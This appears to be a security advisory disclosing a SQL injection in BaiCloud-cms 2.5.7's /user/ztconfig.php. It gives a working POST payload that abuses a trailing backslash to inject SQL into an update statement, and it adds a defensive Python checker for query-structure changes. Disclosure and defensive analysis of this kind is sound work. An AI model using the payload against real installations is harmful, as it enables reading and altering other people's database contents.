BaiCloud

BaiCloud-cms 2.5.7 /user/ztconfig.php SQL injection Vulnerability

Link Url : https://github.com/meiko-S/BaiCloud

Edition : latest (2.5.7)

0x01 Vulnerability (/user/ztconfig.php line 65)

After the user logs in, post the following data:

POST /user/ztconfig.php
tongji=1\&baidu_map=,baidu_map=user()#&action=modify&bannerheight=1

Then get the /user/ztconfig.php page to see the result.

0x20 Analysis

We set tongji=1\ and baidu_map=,baidu_map=user()# so the query becomes:

update zzcms_usersetting set comanestyle='',comanecolor='',swf='',daohang='',bannerbg='',bannerheight='1',mobile='0',tongji='1\',baidu_map=',baidu_map=user()#' where username='admin';

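This is a legal SQL statement: the backslash escapes the quote that should close the tongji value, so that string runs on to the quote that opens baidu_map, and the submitted baidu_map text is parsed as SQL instead of data. The # comments out the rest of the statement, including the where clause. When we then get this page, we can read this value.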
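To make the analysis above checkable, here is an added example (not code from BaiCloud or from this advisory) that scans a statement for MySQL string literals and reports whether user input changed the SQL outside them. The scanner is simplified and assumes the default sql_mode, where a backslash escapes the next character; `build_query`, `scan_literals` and `structure_changed` are hypothetical names, and the query template is shortened from the one shown above.

```python
# Added example: a simplified scanner for MySQL single-quoted literals.
# Assumption: default sql_mode, where a backslash escapes the next character.

def scan_literals(sql):
    """Return (literals, skeleton): the string literals in order, and the SQL
    text outside them with each literal replaced by '?' and any '#' comment cut."""
    literals, skeleton, i, n = [], [], 0, len(sql)
    while i < n:
        ch = sql[i]
        if ch == "#":                      # MySQL comment runs to end of line
            break
        if ch != "'":
            skeleton.append(ch)
            i += 1
            continue
        i += 1                             # step past the opening quote
        buf = []
        while i < n:
            if sql[i] == "\\" and i + 1 < n:
                buf.append(sql[i + 1])     # escaped character, including \'
                i += 2
            elif sql[i] == "'" and sql[i + 1:i + 2] == "'":
                buf.append("'")            # '' is a literal quote
                i += 2
            elif sql[i] == "'":
                i += 1                     # closing quote
                break
            else:
                buf.append(sql[i])
                i += 1
        literals.append("".join(buf))
        skeleton.append("?")
    return literals, "".join(skeleton)

def build_query(tongji, baidu_map, username="admin"):
    # Hypothetical concatenation, shortened from the query shown on the page.
    return ("update zzcms_usersetting set bannerheight='1',tongji='" + tongji
            + "',baidu_map='" + baidu_map + "' where username='" + username + "';")

def structure_changed(tongji, baidu_map):
    """True when the inputs alter the statement outside its string literals."""
    expected = scan_literals(build_query("x", "y"))[1]
    return scan_literals(build_query(tongji, baidu_map))[1] != expected

if __name__ == "__main__":
    # First pair is a constructed benign input; second pair is the page's input.
    for t, b in [("1", "abc"), ("1\\", ",baidu_map=user()#")]:
        lits, skel = scan_literals(build_query(t, b))
        print(structure_changed(t, b), lits, skel)
```

Binding tongji and baidu_map as parameters of a prepared statement keeps the skeleton fixed whatever the values contain.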